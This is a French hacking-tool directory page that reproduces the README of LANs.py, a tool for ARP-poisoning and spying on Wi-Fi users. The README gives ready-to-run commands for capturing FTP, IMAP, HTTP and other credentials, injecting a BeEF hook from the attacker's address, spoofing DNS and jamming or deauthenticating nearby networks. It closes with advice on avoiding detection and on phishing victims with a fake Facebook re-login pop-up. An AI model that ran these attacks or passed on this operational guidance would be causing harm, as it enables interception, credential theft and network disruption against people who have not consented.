Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
LANs.py — Injecter du code et espionner les utilisateurs wifi. | Kitploit
Outils/GitHubGitHub/danmcinerney/lans.py
Sniffing et Analyse de PaquetsOutils de PhishingAudit Wi-FiExploitation d'Applications WebCollecte d'InformationsSécurité RéseauTests d'IntrusionRed TeamingAnalyse DNS
GitHubdanmcinerney/lans.py

LANs.py

Injecter du code et espionner les utilisateurs wifi.

2.6k488il y a 7 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

LANs.py

*** NOTE *** Je ne maintiens plus ce projet. Je recommande vivement d'utiliser bettercap à la place pour les besoins ARP et MITM.

  • Trouve automatiquement les utilisateurs WLAN les plus actifs, puis espionne l'un d'eux et/ou injecte du HTML/JS arbitraire dans les pages qu'ils visitent.

    • Empoisonne individuellement les tables ARP de la machine cible, du routeur et du serveur DNS si nécessaire. N'empoisonne personne d'autre sur le réseau. Affiche la plupart des éléments intéressants de leur trafic et peut injecter du HTML personnalisé dans les pages qu'ils visitent. Se nettoie tout seul après usage.
  • Peut également être utilisé pour brouiller en continu les réseaux WiFi à proximité. La portée approximative est d'un pâté de maisons, mais cela peut varier en fonction de la puissance de votre carte WiFi. Cela peut être affiné pour brouiller tout le monde ou même un seul client. (Impossible de brouiller le WiFi et d'espionner simultanément)

Prérequis : Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optionnel), nmap, nbtscan, et une carte WiFi capable de mode promiscuité si vous choisissez de ne pas utiliser l'option -ip

Testé sur Kali 1.0. Dans les exemples suivants, 192.168.0.5 sera la machine attaquante et 192.168.0.10 sera la victime.

Toutes les options :

root@kitploit:~
Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
                [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
                [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
                [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL]
                [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS]
                [--directedonly] [--accesspoint ACCESSPOINT]

#Utilisation

Utilisation courante :

root@kitploit:~
python LANs.py -u -p

Identification active de cible qui empoisonne ARP la cible choisie et affiche toutes les données non-HTTPS intéressantes qu'elle envoie ou demande. Il n'y a pas d'option -ip, donc cela scanne ARP le réseau, le compare à une capture promiscuité en direct et liste tous les clients du réseau. Tente d'étiqueter les cibles avec un nom NetBIOS Windows et affiche le nombre de paquets de données qu'elles envoient/reçoivent. La capacité à capturer les paquets de données qu'elles envoient dépend beaucoup de la proximité physique et de la puissance de votre carte réseau. Ctrl-C quand vous êtes prêt et choisissez votre cible, qui sera alors empoisonnée ARP.

Prend en charge l'interception et la récolte de données pour les protocoles suivants : HTTP, FTP, IMAP, POP3, IRC. Affiche les 135 premiers caractères des URL visitées et ignore les URL se terminant par .jpg, .jpeg, .gif, .css, .ico, .js, .svg et .woff. Affiche également tous les noms d'utilisateur/mots de passe saisis pour les protocoles, les recherches effectuées sur n'importe quel site, les e-mails envoyés/reçus et les messages IRC envoyés/reçus. Capture d'écran : http://i.imgur.com/kQofTYP.png

Exécuter LANs.py sans argument vous donnera la liste des cibles actives et, après en avoir sélectionné une, agira comme un simple empoisonneur ARP.

Autre utilisation courante :

root@kitploit:~
python LANs.py -u -p -d -ip 192.168.0.10

-d : ouvre un xterm avec driftnet pour voir toutes les images qu'ils consultent

-ip : cible cette adresse IP et ignore la recherche active de cible au début

Injection HTML :

root@kitploit:~
python LANs.py -b http://192.168.0.5:3000/hook.js

Injecte une URL de hook BeEF (http://beefproject.com/, tutoriel : http://resources.infosecinstitute.com/beef-part-1/) dans les pages visitées par la victime. Cela encapsule simplement l'argument dans des balises <script> donc vous pouvez en fait entrer n'importe quel emplacement d'un fichier javascript. Tente de l'insérer après la première balise </head> trouvée dans le HTML de la page.

root@kitploit:~
python LANs.py -c '<title>Owned.</title>'

Injecte du HTML arbitraire dans les pages visitées par la victime. Essaie d'abord de l'injecter après la première balise <head> et, en cas d'échec, l'injecte avant la première balise </head>. Cet exemple changera le titre de la page en 'Owned.'

Lire depuis un pcap :

root@kitploit:~
python LANs.py -pcap libpcapfilename -ip 192.168.0.10

Pour lire depuis un fichier pcap, vous devez inclure l'adresse IP de la cible avec l'option -ip. Le fichier doit également être au format libpcap, ce qui est le plus courant de toute façon. Un avantage de la lecture depuis un fichier pcap est que vous n'avez pas besoin d'être root pour exécuter le script.

Usurpation DNS

root@kitploit:~
python LANs.py -a -r 80.87.128.67
root@kitploit:~
python LANs.py -dns eff.org

Exemple 1 : L'option -a usurpe chaque requête DNS effectuée par la victime et, utilisée avec -r, les redirige vers l'adresse de l'argument -r. La victime sera redirigée vers stallman.org (80.87.128.67) quoi qu'elle tape dans la barre d'adresse.

Exemple 2 : Cela usurpe le domaine eff.org et ses sous-domaines. Lorsqu'il n'y a pas d'argument -r avec les arguments -a ou -dns, le script redirige par défaut la victime vers l'adresse IP de l'attaquant. Si la victime essaie d'aller sur eff.org, elle sera redirigée vers l'IP de l'attaquant.

Utilisation la plus agressive :

root@kitploit:~
python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10

Brouiller tous les réseaux WiFi :

root@kitploit:~
python LANs.py

Toutes les options :


Utilisation normale :

  • -b BEEF_HOOK_URL : copiez l'URL du hook BeEF pour l'injecter dans chaque page visitée par la victime, ex : -b http://192.168.1.10:3000/hook.js

  • -c 'CODE HTML' : injecte du code HTML arbitraire dans les pages visitées par la victime ; incluez les guillemets lors du choix du HTML à injecter

  • -d : ouvre un xterm avec driftnet pour voir toutes les images qu'ils consultent

  • -dns DOMAINE : usurpe le DNS du DOMAINE. ex : -dns facebook.com usurpera DNS chaque requête DNS vers facebook.com ou sous-domaine.facebook.com

  • -a : usurpe chaque réponse DNS de la victime, créant ainsi une page de portail captif ; l'option -r peut être utilisée conjointement

  • -r ADRESSEIP : à utiliser uniquement avec l'option -dns DOMAINE ; redirige l'utilisateur vers cette ADRESSEIP lorsqu'il visite le DOMAINE

  • -u : affiche les URL visitées ; tronque à 150 caractères et filtre les URL d'images/css/js/woff/svg car elles spamment la sortie et ne sont pas intéressantes

  • -i INTERFACE : spécifie l'interface ; par défaut, la première interface dans ip route, ex : -i wlan0

  • -ip : cible cette adresse IP

  • -n : effectue un scan nmap rapide de la cible

  • -na : effectue un scan nmap agressif en arrière-plan et enregistre la sortie dans [adresse IP de la victime].nmap.txt

  • -p : affiche les noms d'utilisateur/mots de passe pour FTP/IMAP/POP/IRC/HTTP, les requêtes HTTP POST, toutes les recherches effectuées, les e-mails entrants/sortants et les messages IRC envoyés/reçus

  • -pcap FICHIER_PCAP : analyse tous les paquets d'un fichier pcap ; nécessite l'argument -ip [adresse IP de la cible]

  • -rmac MAC_ROUTEUR : entrez l'adresse MAC du routeur ici si vous rencontrez des difficultés pour que le script la récupère automatiquement

  • -rip IP_ROUTEUR : entrez l'adresse IP du routeur ici si vous rencontrez des difficultés pour que le script la récupère automatiquement

  • -v : affiche les URL verboses qui ne sont pas tronquées à 150 caractères comme avec -u

Brouillage WiFi :

  • -s Adresse_MAC_à_ignorer : spécifie une adresse MAC à ignorer lors du désauthentification. Exemple : -s 00:11:BB:33:44:AA
  • -ch CANAL : limite le brouilleur à un seul canal
  • -m MAXIMUM : nombre maximum de clients à désauthentifier. À utiliser si vous vous déplacez pour éviter de désauthentifier des paires client/AP en dehors de la portée actuelle.
  • -no : ne pas vider la liste de désauthentification lorsque le nombre maximum (-m) de combinaisons client/AP est atteint. Doit être utilisé conjointement avec -m. Exemple : -m 10 -n
  • -t INTERVALLE_TEMPS : temps entre chaque paquet de désauthentification. Par défaut, le maximum. Si vous rencontrez des erreurs scapy comme 'no buffer space', essayez : -t .00001
  • --packets NOMBRE : nombre de paquets à envoyer dans chaque rafale de désauthentification. Par défaut, 1 paquet.
  • --directedonly : n'envoyer les paquets de désauthentification qu'aux paires client/AP et non à l'adresse de diffusion des points d'accès
  • --accesspoint MAC_ROUTEUR : entrez l'adresse MAC d'un point d'accès spécifique à cibler.

Nettoyage

Après avoir reçu un Ctrl-C :

  • Désactive le routage IP

  • Vide le pare-feu iptables

  • Restaure individuellement les tables ARP du routeur et de la victime

Détails techniques

Ce script utilise une file d'attente nfqueue-bindings python encapsulée dans un Twisted IReadDescriptor pour alimenter les fonctions de rappel avec des paquets. nfqueue-bindings est utilisé pour supprimer et transmettre certains paquets. La bibliothèque scapy de Python fait le travail d'analyse et d'injection de paquets.

Injecter du code sans être détecté est un jeu risqué : si un petit problème survient ou si le serveur auquel la victime demande des données se comporte de manière unique ou rare, l'utilisateur ne pourra pas ouvrir la page qu'il essaie de consulter et saura que quelque chose ne va pas. Ce script est conçu pour transmettre les paquets si quoi que ce soit échoue, donc pendant l'utilisation, vous pouvez voir beaucoup de "[!] Paquet injecté pour www.domain.com" mais ne voir qu'un ou deux domaines sur le panneau BeEF où le navigateur est accroché. C'est normal. S'ils ne sont pas accrochés dès la première page, attendez qu'ils naviguent sur quelques autres pages. Le but est de passer inaperçu. Mes outils BeEF préférés se trouvent dans Commandes > Ingénierie sociale. Faites des choses comme créer une fausse pop-up Facebook officielle indiquant que l'authentification de l'utilisateur a expiré et qu'il doit ressaisir ses identifiants.


  • danmcinerney.org
  • Analytics
Télécharger l’outil